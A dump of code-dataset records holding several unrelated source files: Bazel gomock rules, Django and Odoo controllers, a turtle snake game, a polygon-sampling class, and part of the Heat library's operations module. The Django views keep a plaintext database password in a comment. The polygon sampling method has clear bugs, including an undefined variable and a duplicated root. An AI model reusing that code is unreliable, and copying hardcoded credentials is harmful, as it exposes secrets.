**kwargs):\n interfaces = kwargs.get(\"interfaces\", None)\n mockgen_model_lib = _MOCKGEN_MODEL_LIB\n if kwargs.get(\"mockgen_model_library\", None):\n mockgen_model_lib = kwargs[\"mockgen_model_library\"]\n\n prog_src = name + \"_gomock_prog\"\n prog_src_out = prog_src + \".go\"\n _gomock_prog_gen(\n name = prog_src,\n interfaces = interfaces,\n library = library,\n package = kwargs.get(\"package\", None),\n out = prog_src_out,\n mockgen_tool = mockgen_tool,\n )\n prog_bin = name + \"_gomock_prog_bin\"\n go_binary(\n name = prog_bin,\n srcs = [prog_src_out],\n deps = [library, mockgen_model_lib],\n )\n _gomock_prog_exec(\n name = name,\n interfaces = interfaces,\n library = library,\n package = kwargs.get(\"package\", None),\n out = out,\n prog_bin = prog_bin,\n mockgen_tool = mockgen_tool,\n self_package = kwargs.get(\"self_package\", None),\n )\n\ndef _gomock_prog_gen_impl(ctx):\n args = [\"-prog_only\"]\n if ctx.attr.package != \"\":\n args += [\"-package\", ctx.attr.package]\n args += [ctx.attr.library[GoLibrary].importpath]\n args += [\",\".join(ctx.attr.interfaces)]\n\n cmd = ctx.file.mockgen_tool\n out = ctx.outputs.out\n ctx.actions.run_shell(\n outputs = [out],\n tools = [cmd],\n command = \"\"\"\n {cmd} {args} > {out}\n \"\"\".format(\n cmd = \"$(pwd)/\" + cmd.path,\n args = \" \".join(args),\n out = out.path,\n ),\n )\n\n_gomock_prog_gen = go_rule(\n _gomock_prog_gen_impl,\n attrs = {\n \"library\": attr.label(\n doc = \"The target the Go library is at to look for the interfaces in. When this is set and source is not set, mockgen will use its reflect code to generate the mocks.\",\n providers = [GoLibrary],\n mandatory = True,\n ),\n \"out\": attr.output(\n doc = \"The new Go source file put the mock generator code\",\n mandatory = True,\n ),\n \"interfaces\": attr.string_list(\n allow_empty = False,\n doc = \"The names of the Go interfaces to generate mocks for. If not set, all of the interfaces in the library or source file will have mocks generated for them.\",\n mandatory = True,\n ),\n \"package\": attr.string(\n doc = \"The name of the package the generated mocks should be in. If not specified, uses mockgen's default.\",\n ),\n \"mockgen_tool\": attr.label(\n doc = \"The mockgen tool to run\",\n default = Label(_MOCKGEN_TOOL),\n allow_single_file = True,\n executable = True,\n cfg = \"host\",\n mandatory = False,\n ),\n },\n)\n\ndef _gomock_prog_exec_impl(ctx):\n args = [\"-exec_only\", ctx.file.prog_bin.path]\n if ctx.attr.package != \"\":\n args += [\"-package\", ctx.attr.package]\n\n if ctx.attr.self_package != \"\":\n args += [\"-self_package\", ctx.attr.self_package]\n\n args += [ctx.attr.library[GoLibrary].importpath]\n args += [\",\".join(ctx.attr.interfaces)]\n\n ctx.actions.run_shell(\n outputs = [ctx.outputs.out],\n inputs = [ctx.file.prog_bin],\n tools = [ctx.file.mockgen_tool],\n command = \"\"\"{cmd} {args} > {out}\"\"\".format(\n cmd = \"$(pwd)/\" + ctx.file.mockgen_tool.path,\n args = \" \".join(args),\n out = ctx.outputs.out.path,\n ),\n env = {\n # GOCACHE is required starting in Go 1.12\n \"GOCACHE\": \"./.gocache\",\n },\n )\n\n_gomock_prog_exec = go_rule(\n _gomock_prog_exec_impl,\n attrs = {\n \"library\": attr.label(\n doc = \"The target the Go library is at to look for the interfaces in. When this is set and source is not set, mockgen will use its reflect code to generate the mocks. If source is set, its dependencies will be included in the GOPATH that mockgen will be run in.\",\n providers = [GoLibrary],\n mandatory = True,\n ),\n \"out\": attr.output(\n doc = \"The new Go source file to put the generated mock code\",\n mandatory = True,\n ),\n \"interfaces\": attr.string_list(\n allow_empty = False,\n doc = \"The names of the Go interfaces to generate mocks for. If not set, all of the interfaces in the library or source file will have mocks generated for them.\",\n mandatory = True,\n ),\n \"package\": attr.string(\n doc = \"The name of the package the generated mocks should be in. If not specified, uses mockgen's default.\",\n ),\n \"self_package\": attr.string(\n doc = \"The full package import path for the generated code. The purpose of this flag is to prevent import cycles in the generated code by trying to include its own package. This can happen if the mock's package is set to one of its inputs (usually the main one) and the output is stdio so mockgen cannot detect the final output package. Setting this flag will then tell mockgen which import to exclude.\",\n ),\n \"prog_bin\": attr.label(\n doc = \"The program binary generated by mockgen's -prog_only and compiled by bazel.\",\n allow_single_file = True,\n executable = True,\n cfg = \"host\",\n mandatory = True,\n ),\n \"mockgen_tool\": attr.label(\n doc = \"The mockgen tool to run\",\n default = Label(_MOCKGEN_TOOL),\n allow_single_file = True,\n executable = True,\n cfg = \"host\",\n mandatory = False,\n ),\n },\n)\n","repo_name":"micnncim/protocol-buffers-language-server","sub_path":"build/bazel/gomock.bzl","file_name":"gomock.bzl","file_ext":"bzl","file_size_in_byte":9532,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"71"}
+{"seq_id":"39899814351","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('/', views.results_by_order, name='results_by_order'),\n path('viewdb', views.dbOrder.as_view(), name='probando'),\n path('all_categories', views.Stadistics.as_view(), name='products_by_category'),\n path('all_payments', views.Payments.as_view(), name='types_payments'),\n]","repo_name":"tiarasilva/toteat-tiara","sub_path":"backend/polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"71339339430","text":"import turtle\nimport random\nimport time\n\n# Set up the screen\nscreen = turtle.Screen()\nscreen.title(\"Snake Game\")\nscreen.setup(width=800, height=800)\nscreen.bgcolor(\"green\")\nscreen.tracer(0)\n\n# Create border\nborder_pen = turtle.Turtle()\nborder_pen.speed(0)\nborder_pen.color(\"orange\")\nborder_pen.pensize(4)\nborder_pen.penup()\nborder_pen.goto(-310, 250)\nborder_pen.pendown()\nfor _ in range(2):\n border_pen.forward(620)\n border_pen.right(90)\n border_pen.forward(500)\n border_pen.right(90)\nborder_pen.hideturtle()\n\n# Score\nscore = 0\n\n# Snake\nsnake = turtle.Turtle()\nsnake.speed(0)\nsnake.shape(\"square\")\nsnake.color(\"red\") \nsnake.penup()\nsnake.goto(0, 0)\nsnake.direction = \"stop\"\n\n# Food\nfruit = turtle.Turtle()\nfruit.speed(0)\nfruit.shape(\"square\")\nfruit.color(\"white\")\nfruit.penup()\nfruit.goto(30, 30)\n\n# Scoring\nscoring = turtle.Turtle()\nscoring.speed(0)\nscoring.color(\"white\")\nscoring.penup()\nscoring.hideturtle()\nscoring.goto(0, 350)\nscoring.write(\"Score: \", align=\"center\", font=(\"Courier\", 24, \"bold\"))\n\n# Functions for movement\ndef snake_go_up():\n if snake.direction != \"down\":\n snake.direction = \"up\"\n\ndef snake_go_down():\n if snake.direction != \"up\":\n snake.direction = \"down\"\n\ndef snake_go_left():\n if snake.direction != \"right\":\n snake.direction = \"left\"\n\ndef snake_go_right():\n if snake.direction != \"left\":\n snake.direction = \"right\"\n\ndef snake_move():\n if snake.direction == \"up\":\n y = snake.ycor()\n snake.sety(y + 20)\n elif snake.direction == \"down\":\n y = snake.ycor()\n snake.sety(y - 20)\n elif snake.direction == \"left\":\n x = snake.xcor()\n snake.setx(x - 20)\n elif snake.direction == \"right\":\n x = snake.xcor()\n snake.setx(x + 20)\n\n# Keyboard bindings\nscreen.listen()\nscreen.onkeypress(snake_go_up, \"Up\")\nscreen.onkeypress(snake_go_down, \"Down\")\nscreen.onkeypress(snake_go_left, \"Left\")\nscreen.onkeypress(snake_go_right, \"Right\")\n\n# Main game loop\ndelay = 0.1\nold_fruit = []\n\nwhile True:\n screen.update()\n\n # Check for collision with food\n if snake.distance(fruit) < 20:\n x = random.randint(-290, 270)\n y = random.randint(-240, 240)\n fruit.goto(x, y)\n\n # Update score\n score += 1\n scoring.clear()\n scoring.write(\"Score: {}\".format(score), align=\"center\", font=(\"Courier\", 24, \"bold\"))\n\n # Add a new piece to the snake\n new_fruit = turtle.Turtle()\n new_fruit.speed(0)\n new_fruit.shape(\"square\")\n new_fruit.color(\"red\")\n new_fruit.penup()\n old_fruit.append(new_fruit)\n\n # Move the end pieces first in reverse order\n for index in range(len(old_fruit) - 1, 0, -1):\n x = old_fruit[index - 1].xcor()\n y = old_fruit[index - 1].ycor()\n old_fruit[index].goto(x, y)\n\n # Move the first piece to where the snake's head is\n if len(old_fruit) > 0:\n x = snake.xcor()\n y = snake.ycor()\n old_fruit[0].goto(x, y)\n\n # Move the snake\n snake_move()\n\n # Check for collisions with border\n if (\n snake.xcor() > 280\n or snake.xcor() < -300\n or snake.ycor() > 240\n or snake.ycor() < -240\n ):\n time.sleep(1)\n snake.goto(0, 0)\n snake.direction = \"stop\"\n\n # Reset score and hide old fruit pieces\n score = 0\n scoring.clear()\n for piece in old_fruit:\n piece.goto(1000, 1000)\n old_fruit.clear()\n\n # Check for collisions with snake's body\n for piece in old_fruit:\n if piece.distance(snake) < 20:\n time.sleep(1)\n snake.goto(0, 0)\n snake.direction = \"stop\"\n\n # Reset score and hide old fruit pieces\n score = 0\n scoring.clear()\n for piece in old_fruit:\n piece.goto(1000, 1000)\n old_fruit.clear()\n\n # Pause before the next frame\n time.sleep(delay)\n\nturtle.done()\n","repo_name":"Jkhattak/SnakeGameInPython","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"33936355855","text":"import logging\nfrom odoo import _\nfrom odoo.exceptions import MissingError\nfrom odoo.http import Controller, request, route\nfrom .utils import clean_action\n\n\n_logger = logging.getLogger(__name__)\n\n\nclass Action(Controller):\n\n @route('/web/action/load', type='json', auth=\"user\")\n def load(self, action_id, additional_context=None):\n Actions = request.env['ir.actions.actions']\n value = False\n try:\n action_id = int(action_id)\n except ValueError:\n try:\n action = request.env.ref(action_id)\n assert action._name.startswith('ir.actions.')\n action_id = action.id\n except Exception as exc:\n raise MissingError(_(\"The action %r does not exist.\", action_id)) from exc\n\n base_action = Actions.browse([action_id]).sudo().read(['type'])\n if base_action:\n action_type = base_action[0]['type']\n if action_type == 'ir.actions.report':\n request.update_context(bin_size=True)\n if additional_context:\n request.update_context(**additional_context)\n action = request.env[action_type].sudo().browse([action_id]).read()\n if action:\n value = clean_action(action[0], env=request.env)\n return value\n\n @route('/web/action/run', type='json', auth=\"user\")\n def run(self, action_id, context=None):\n if context:\n request.update_context(**context)\n action = request.env['ir.actions.server'].browse([action_id])\n result = action.run()\n return clean_action(result, env=action.env) if result else False\n","repo_name":"odoo/odoo","sub_path":"addons/web/controllers/action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":31745,"dataset":"github-code","pt":"71"}
+{"seq_id":"9094052529","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom cmath import polar, rect\n\ndef cal_dist(point):\n return sum([p**2 for p in point])\n\nclass ParamPoly2D:\n def __init__(self,r ,n):\n '''\n '''\n self.r = r\n self.n = n\n self.root_coor, self.curve = self.generate_curve()\n self.plotting = False\n\n def generate_curve(self):\n '''\n '''\n self.diff_angle = 2 * np.pi/ self.n\n self.init_phasor = rect(self.r,0)\n roots = [ (self.r, i*self.diff_angle) for i in range(self.n) ]\n self.edge = 2*self.r*np.sin(self.diff_angle/2)\n ds = 0.05/self.edge\n self.s = np.arange(0,self.n,ds)\n x, y = [], []\n for i_s in self.s:\n i = np.floor(i_s)\n tau = i_s - i\n point = self.r*rect(1,self.diff_angle*i)*((1-tau) + tau*rect(1,self.diff_angle))\n x.append(point.real)\n y.append(point.imag) \n root_coors = [rect(*root).real for root in roots ],[rect(*root).imag for root in roots ]\n \n return root_coors, (x,y)\n \n def plot(self,x,y,points=True):\n '''\n '''\n plt.plot(x,y, \"xb\" if points else \"-r\", label=\"input\")\n plt.grid(True)\n plt.axis(\"equal\")\n plt.xlabel(\"x[m]\")\n plt.ylabel(\"y[m]\")\n plt.legend()\n self.plotting = True\n\n def __call__(self, r, n):\n '''\n '''\n self.__init__(r,n)\n return self\n\n def sample(self, point, dist, cen_point=[0, 0]):\n '''\n '''\n relative_dist = sorted([root for root in zip(*self.root_coor)], key=lambda x: (x[0]-point[0])**2+(x[1]-point[1])**2 )\n \n root_1 = relative_dist[0]\n root_2 = relative_dist[0]\n poly_edge = [ root_1[i]-root_2[i] for i in range(2) ]\n cen_loc = [ cen_point[i]-point[i] for i in range(2) ]\n a = np.array(\n [\n [ poly_edge[0], cen_loc[0] ],\n [ poly_edge[1], cen_loc[1] ]\n ])\n b = np.array([\n cen_loc[0]-root_1[0], cen_loc[1]-root_1[0]\n ])\n ratio = np.linalg.solve(a, b)\n sol = [ (ratio[0]*poly_edge[i]) + root_1[i] for i in range(2) ]\n\n delta = np.sqrt(sum([ (root_1[i] - sol[i])**2 for i in range(2)]))\n curl = np.cross( [sol[i]-root_1[i] for i in range(2)], root_1)\n if curl>=0:\n dist += delta\n else:\n dist -= delta \n \n root_ind = list(zip(*self.root_coor)).index(root_1)\n\n if dist>=0:\n i = (dist)//cal_dist(poly_edge)\n root_ind += i\n dist %= cal_dist(poly_edge)\n else:\n i = (-dist)//cal_dist(poly_edge)\n root_ind -= i\n dist = - ( (-dist)%cal_dist(poly_edge))\n final_point = [self.root_coor[0][root_ind%n], self.root_coor[1][root_ind%n]]\n lmd = 0\n if dist>=0:\n lmd = abs(dist)/cal_dist(poly_edge)\n nxt_point = [self.root_coor[0][(root_ind+1)%n], self.root_coor[1][(root_ind+1)%n]]\n poly_edge = [nxt_point[i]-final_point[i] for i in range(2)]\n else:\n lmd = abs(dist)/cal_dist(poly_edge)\n nxt_point = [self.root_coor[0][(root_ind-1)%n], self.root_coor[1][(root_ind-1)%n]]\n poly_edge = [nxt_point[i]-final_point[i] for i in range(2)]\n \n sampled_point = [(lmd*poly_edge[i]) + final_point[i] for i in range(2)]\n\n return sampled_point\n\n def sample_near(self, point):\n best_point = min([root for root in zip(*self.root_coor)], key=lambda x: (x[0]-point[0])**2+(x[1]-point[1])**2 )\n if self.plotting: \n plt.plot(*best_point,\"xg\")\n return best_point\n\n def lookup(self, obs_point, cen_point):\n '''\n For the given input point returns features of the polygon\n '''\n point = [obs_point[i] - cen_point[i] for i in range(2)]\n obs2cen = [cen_point[i] - obs_point[i] for i in range(2)]\n vec = [self.n, self.r, *self.sample_near(point), *obs2cen]\n\nif __name__ == \"__main__\":\n polygon = ParamPoly2D(50,9)\n plt.subplots(1)\n polygon.plot(*polygon.root_coor, points=True)\n polygon.plot(*polygon.curve, points=False)\n #polygon.sample_near((1,2))\n #polygon = polygon(5,3)\n #polygon.plot(*polygon.root_coor, points=True)\n #polygon.plot(*polygon.curve, points=False)\n plt.show()\n","repo_name":"Robotics-Club-IIT-BHU/ModularBot_Planner","sub_path":"coordination/parametric_curve.py","file_name":"parametric_curve.py","file_ext":"py","file_size_in_byte":4401,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"70322023591","text":"#!/usr/bin/env python\n\n\nimport confu\nparser = confu.standard_parser(\"clog configuration script\")\n\n\ndef main(args):\n options = parser.parse_args(args)\n build = confu.Build.from_options(options)\n\n build.export_cpath(\"include\", [\"clog.h\"])\n\n with build.options(source_dir=\"src\", extra_include_dirs=\"src\"):\n build.static_library(\"clog\", build.cc(\"clog.c\"))\n\n with build.options(source_dir=\"test\", deps={\n (build, build.deps.googletest): all,\n \"log\": build.target.is_android}):\n build.unittest(\"clog-test\", build.cxx(\"clog.cc\"))\n\n return build\n\nif __name__ == \"__main__\":\n import sys\n main(sys.argv[1:]).generate()\n","repo_name":"pytorch/cpuinfo","sub_path":"deps/clog/configure.py","file_name":"configure.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":866,"dataset":"github-code","pt":"71"}
+{"seq_id":"36216173988","text":"numset = { int(line) for line in open(\"sum.txt\") }\n\ntarget_range = range(-10000, 10000 + 1) # Inclusive\ntargetset = set()\n\nprint(\"Initialized!\")\n\ndivisor_dict = {}\ndivisor = max(target_range) - min(target_range)\nfor a in numset:\n divisor_index = int( a / divisor )\n if divisor_index in divisor_dict:\n divisor_dict[divisor_index].append(a)\n else:\n divisor_dict[divisor_index] = [a]\n\nprint(\"Formed dict!\")\n\nmember_set = set()\nfor a in numset:\n if a in member_set: pass\n targetlist = []\n divisor_index = int( ( min(target_range) - a ) / divisor )\n for index in range(divisor_index - 1, divisor_index + 2): # Check [divisor_index - 1, divisor_index +1]\n if index in divisor_dict:\n targetlist.extend(divisor_dict[index])\n # print(\"targetlist: {}\".format(targetlist))\n for b in targetlist:\n if a + b in target_range:\n # print(\"FOUND!!! {} + {} = {}\".format(a,b,a+b))\n targetset.add( a + b )\n member_set.add(a) ## Already sent a, which should only be found once\n member_set.add(b)\n\nprint(len(targetset))\nprint('\\a')\n","repo_name":"timeemit/algorithms","sub_path":"6/sum.py","file_name":"sum.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"29912403872","text":"import matplotlib\nmatplotlib.use('Agg')\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom .models import Registration\nfrom .forms import RegistrationForm\nfrom django.http import HttpResponseRedirect\nimport matplotlib.pyplot as plt\nimport pandas as pd\n#import mysql.connector as sql\nfrom urllib.parse import quote\nfrom sqlalchemy import create_engine\nfrom .serializers import RegistrationSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom django.db.models import Q\nfrom datetime import date,timedelta\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom django.http import HttpResponse\nfrom rest_framework.authtoken.views import ObtainAuthToken\n\n\nengine = create_engine(\n 'sqlite:///db.sqlite3',\n )\n\n#db_connection = sql.connect(host='localhost', database='sds_db', user='adarsh', password='Dbpass@1')\n\n#db_cursor = db_connection.cursor()\n\n# [model -> view]Create your views here.what needs to be shown in webpage\n\n'''def count_rows():\n #query=pd.read_sql('select * from main_registration',con=engine)\n #df=pd.DataFrame(query)\n #total = df['id'].count()\n total=Registration.objects.all().count()\n return total'''\n\ndef home(request):\n #sitename = 'SHARMA DRIVING SCHOOL'\n #registerdata = Registration.objects.raw('select id,address from main_registration')\n #data = {\n # 'registerdata':registerdata\n #}\n total=Registration.objects.all().count()\n chart = pd.read_sql('select count(address) as count,address from main_registration group by address',con=engine)\n df = pd.DataFrame(chart)\n X = list(df.iloc[:,1])\n Y = list(df.iloc[:,0])\n plt.bar(X,Y, color=['orange', 'red', 'green', 'blue', 'cyan', 'yellow'])\n plt.xlabel(\"Areas covered\")\n plt.ylabel(\"No. of counts\")\n plt.savefig('./main/static/img/foo.png',dpi=300,) \n \n return render(request, 'front/home.html',{'total':total})\n\ndef about(request):\n\n return render(request, 'front/about.html')\n\ndef contact(request):\n\n return render(request, 'front/contact.html')\n\ndef register(request):\n \n submitted = False\n if request.method == \"POST\":\n form = RegistrationForm(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect('/register?submitted=True')\n else:\n form = RegistrationForm\n if 'submitted' in request.GET:\n submitted = True\n return render(request, 'front/register.html',{'form':form,'submitted':submitted})\n\ndef certificate(request):\n ref=date.today()-timedelta(days=15)\n if request.method == 'GET':\n query= request.GET.get('q')\n\n submitbutton= request.GET.get('submit')\n \n if query is not None:\n #lookups= Q(name__icontains=query) | Q(address__icontains=query)\n lookups= Q(date__icontains=query)\n results= Registration.objects.filter(lookups).distinct()\n\n context={'results': results,\n 'submitbutton': submitbutton}\n #print(\"ref\",ref)\n return render(request, 'front/certificate.html', context)\n\n else:\n new_date={\"ref\":str(ref)}\n print(\"ref\",ref)\n return render(request, 'front/certificate.html',new_date)\n\n else:\n #print(\"ref\",ref)\n return render(request, 'front/certificate.html',{'ref':ref})\n #return render(request, 'front/certificate.html')\n\n@api_view(['GET','POST'])\ndef Registration_list(request):\n if request.method == 'GET':\n register=Registration.objects.all()\n serializer=RegistrationSerializer(register,many=True)\n return Response(serializer.data)\n \n if request.method == 'POST':\n serializer=RegistrationSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data,status=status.HTTP_201_CREATED)\n\n\n\n\n \n\n\n","repo_name":"first-second/sds","sub_path":"myproject/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"40307268554","text":"import builtins\nimport numpy as np\nimport torch\nimport warnings\n\nfrom .communication import MPI, MPI_WORLD\nfrom . import factories\nfrom . import devices\nfrom . import stride_tricks\nfrom . import sanitation\nfrom . import statistics\nfrom . import dndarray\nfrom . import types\n\n__all__ = []\n__BOOLEAN_OPS = [MPI.LAND, MPI.LOR, MPI.BAND, MPI.BOR]\n\n\ndef __binary_op(operation, t1, t2, out=None):\n \"\"\"\n Generic wrapper for element-wise binary operations of two operands (either can be tensor or scalar).\n Takes the operation function and the two operands involved in the operation as arguments.\n\n Parameters\n ----------\n operation : function\n The operation to be performed. Function that performs operation elements-wise on the involved tensors,\n e.g. add values from other to self\n\n t1: dndarray or scalar\n The first operand involved in the operation,\n\n t2: dndarray or scalar\n The second operand involved in the operation,\n\n Returns\n -------\n result: ht.DNDarray\n A DNDarray containing the results of element-wise operation.\n \"\"\"\n if np.isscalar(t1):\n try:\n t1 = factories.array(\n [t1], device=t2.device if isinstance(t2, dndarray.DNDarray) else None\n )\n except (ValueError, TypeError):\n raise TypeError(\"Data type not supported, input was {}\".format(type(t1)))\n\n if np.isscalar(t2):\n try:\n t2 = factories.array([t2])\n except (ValueError, TypeError):\n raise TypeError(\n \"Only numeric scalars are supported, but input was {}\".format(type(t2))\n )\n output_shape = (1,)\n output_split = None\n output_device = t2.device\n output_comm = MPI_WORLD\n elif isinstance(t2, dndarray.DNDarray):\n output_shape = t2.shape\n output_split = t2.split\n output_device = t2.device\n output_comm = t2.comm\n else:\n raise TypeError(\n \"Only tensors and numeric scalars are supported, but input was {}\".format(type(t2))\n )\n\n if t1.dtype != t2.dtype:\n t1 = t1.astype(t2.dtype)\n\n elif isinstance(t1, dndarray.DNDarray):\n if np.isscalar(t2):\n try:\n t2 = factories.array([t2], device=t1.device)\n output_shape = t1.shape\n output_split = t1.split\n output_device = t1.device\n output_comm = t1.comm\n except (ValueError, TypeError):\n raise TypeError(\"Data type not supported, input was {}\".format(type(t2)))\n\n elif isinstance(t2, dndarray.DNDarray):\n if t1.split is None:\n t1 = factories.array(\n t1, split=t2.split, copy=False, comm=t1.comm, device=t1.device, ndmin=-t2.ndim\n )\n elif t2.split is None:\n t2 = factories.array(\n t2, split=t1.split, copy=False, comm=t2.comm, device=t2.device, ndmin=-t1.ndim\n )\n elif t1.split != t2.split:\n # It is NOT possible to perform binary operations on tensors with different splits, e.g. split=0\n # and split=1\n raise NotImplementedError(\"Not implemented for other splittings\")\n\n output_shape = stride_tricks.broadcast_shape(t1.shape, t2.shape)\n output_split = t1.split\n output_device = t1.device\n output_comm = t1.comm\n\n # ToDo: Fine tuning in case of comm.size>t1.shape[t1.split]. Send torch tensors only to ranks, that will hold data.\n if t1.split is not None:\n if t1.shape[t1.split] == 1 and t1.comm.is_distributed():\n warnings.warn(\n \"Broadcasting requires transferring data of first operator between MPI ranks!\"\n )\n if t1.comm.rank > 0:\n t1.larray = torch.zeros(\n t1.shape, dtype=t1.dtype.torch_type(), device=t1.device.torch_device\n )\n t1.comm.Bcast(t1)\n\n if t2.split is not None:\n if t2.shape[t2.split] == 1 and t2.comm.is_distributed():\n warnings.warn(\n \"Broadcasting requires transferring data of second operator between MPI ranks!\"\n )\n if t2.comm.rank > 0:\n t2.larray = torch.zeros(\n t2.shape, dtype=t2.dtype.torch_type(), device=t2.device.torch_device\n )\n t2.comm.Bcast(t2)\n\n else:\n raise TypeError(\n \"Only tensors and numeric scalars are supported, but input was {}\".format(type(t2))\n )\n else:\n raise NotImplementedError(\"Not implemented for non scalar\")\n\n # sanitize output\n if out is not None:\n sanitation.sanitize_out(out, output_shape, output_split, output_device)\n\n promoted_type = types.promote_types(t1.dtype, t2.dtype).torch_type()\n if t1.split is not None:\n if len(t1.lshape) > t1.split and t1.lshape[t1.split] == 0:\n result = t1.larray.type(promoted_type)\n else:\n result = operation(t1.larray.type(promoted_type), t2.larray.type(promoted_type))\n elif t2.split is not None:\n\n if len(t2.lshape) > t2.split and t2.lshape[t2.split] == 0:\n result = t2.larray.type(promoted_type)\n else:\n result = operation(t1.larray.type(promoted_type), t2.larray.type(promoted_type))\n else:\n result = operation(t1.larray.type(promoted_type), t2.larray.type(promoted_type))\n\n if not isinstance(result, torch.Tensor):\n result = torch.tensor(result, device=output_device.torch_device)\n\n if out is not None:\n out_dtype = out.dtype\n out.larray = result\n out._DNDarray__comm = output_comm\n out = out.astype(out_dtype)\n return out\n\n return dndarray.DNDarray(\n result,\n output_shape,\n types.heat_type_of(result),\n output_split,\n output_device,\n output_comm,\n balanced=None,\n )\n\n\ndef __cum_op(x, partial_op, exscan_op, final_op, neutral, axis, dtype, out):\n \"\"\"\n Generic wrapper for cumulative operations, i.e. cumsum(), cumprod(). Performs a three-stage cumulative operation. First, a partial\n cumulative operation is performed node-local that is combined into a global cumulative result via an MPI_Op and a final local\n reduction add or mul operation.\n\n Parameters\n ----------\n x : ht.DNDarray\n The heat DNDarray on which to perform the cumulative operation\n partial_op: function\n The function performing a partial cumulative operation on the process-local data portion, e.g. cumsum().\n exscan_op: mpi4py.MPI.Op\n The MPI operator for performing the exscan based on the results returned by the partial_op function.\n final_op: function\n The local operation for the final result, e.g. add() for cumsum().\n neutral: scalar\n Neutral element for the cumulative operation, i.e. an element that does not change the reductions operations\n result.\n axis: int\n The axis direction of the cumulative operation\n dtype: ht.type\n The type of the result tensor.\n out: ht.DNDarray\n The explicitly returned output tensor.\n\n Returns\n -------\n result: ht.DNDarray\n A DNDarray containing the result of the reduction operation\n\n Raises\n ------\n TypeError\n If the input or optional output parameter are not of type ht.DNDarray\n ValueError\n If the shape of the optional output parameters does not match the shape of the input\n NotImplementedError\n Numpy's behaviour of axis is None is not supported as of now\n RuntimeError\n If the split or device parameters do not match the parameters of the input\n \"\"\"\n # perform sanitation\n sanitation.sanitize_in(x)\n\n if axis is None:\n raise NotImplementedError(\"axis = None is not supported\")\n axis = stride_tricks.sanitize_axis(x.shape, axis)\n\n if dtype is not None:\n dtype = types.canonical_heat_type(dtype)\n\n if out is not None:\n sanitation.sanitize_out(out, x.shape, x.split, x.device)\n dtype = out.dtype\n\n cumop = partial_op(\n x.larray,\n axis,\n out=None if out is None else out.larray,\n dtype=None if dtype is None else dtype.torch_type(),\n )\n\n if x.split is not None and axis == x.split:\n indices = torch.tensor([cumop.shape[axis] - 1], device=cumop.device)\n send = (\n torch.index_select(cumop, axis, indices)\n if indices[0] >= 0\n else torch.full(\n cumop.shape[:axis] + torch.Size([1]) + cumop.shape[axis + 1 :],\n neutral,\n dtype=cumop.dtype,\n device=cumop.device,\n )\n )\n recv = torch.full(\n cumop.shape[:axis] + torch.Size([1]) + cumop.shape[axis + 1 :],\n neutral,\n dtype=cumop.dtype,\n device=cumop.device,\n )\n\n x.comm.Exscan(send, recv, exscan_op)\n final_op(cumop, recv, out=cumop)\n\n if out is not None:\n return out\n\n return factories.array(\n cumop, dtype=x.dtype if dtype is None else dtype, is_split=x.split, device=x.device\n )\n\n\ndef __local_op(operation, x, out, no_cast=False, **kwargs):\n \"\"\"\n Generic wrapper for local operations, which do not require communication. Accepts the actual operation function as\n argument and takes only care of buffer allocation/writing. This function is intended to work on an element-wise bases\n WARNING: the gshape of the result will be the same as x\n\n Parameters\n ----------\n operation : function\n A function implementing the element-wise local operation, e.g. torch.sqrt\n x : ht.DNDarray\n The value for which to compute 'operation'.\n no_cast : bool\n Flag to avoid casting to floats\n out : ht.DNDarray or None\n A location in which to store the results. If provided, it must have a broadcastable shape. If not provided or\n set to None, a fresh tensor is allocated.\n\n Returns\n -------\n result : ht.DNDarray\n A tensor of the same shape as x, containing the result of 'operation' for each element in x. If out was\n provided, result is a reference to it.\n\n Raises\n -------\n TypeError\n If the input is not a tensor or the output is not a tensor or None.\n \"\"\"\n # perform sanitation\n sanitation.sanitize_in(x)\n if out is not None and not isinstance(out, dndarray.DNDarray):\n raise TypeError(\"expected out to be None or an ht.DNDarray, but was {}\".format(type(out)))\n\n # infer the output type of the tensor\n # we need floating point numbers here, due to PyTorch only providing sqrt() implementation for float32/64\n if not no_cast:\n promoted_type = types.promote_types(x.dtype, types.float32)\n torch_type = promoted_type.torch_type()\n else:\n torch_type = x.larray.dtype\n\n # no defined output tensor, return a freshly created one\n if out is None:\n result = operation(x.larray.type(torch_type), **kwargs)\n return dndarray.DNDarray(\n result,\n x.gshape,\n types.canonical_heat_type(result.dtype),\n x.split,\n x.device,\n x.comm,\n x.balanced,\n )\n\n # output buffer writing requires a bit more work\n # we need to determine whether the operands are broadcastable and the multiple of the broadcasting\n # reason: manually repetition for each dimension as PyTorch does not conform to numpy's broadcast semantic\n # PyTorch always recreates the input shape and ignores broadcasting for too large buffers\n broadcast_shape = stride_tricks.broadcast_shape(x.lshape, out.lshape)\n padded_shape = (1,) * (len(broadcast_shape) - len(x.lshape)) + x.lshape\n multiples = [int(a / b) for a, b in zip(broadcast_shape, padded_shape)]\n needs_repetition = builtins.any(multiple > 1 for multiple in multiples)\n\n # do an inplace operation into a provided buffer\n casted = x.larray.type(torch_type)\n operation(casted.repeat(multiples) if needs_repetition else casted, out=out.larray, **kwargs)\n\n return out\n\n\ndef __reduce_op(x, partial_op, reduction_op, neutral=None, **kwargs):\n \"\"\"\n Generic wrapper for reduction operations, e.g. sum(), prod() etc. Performs a 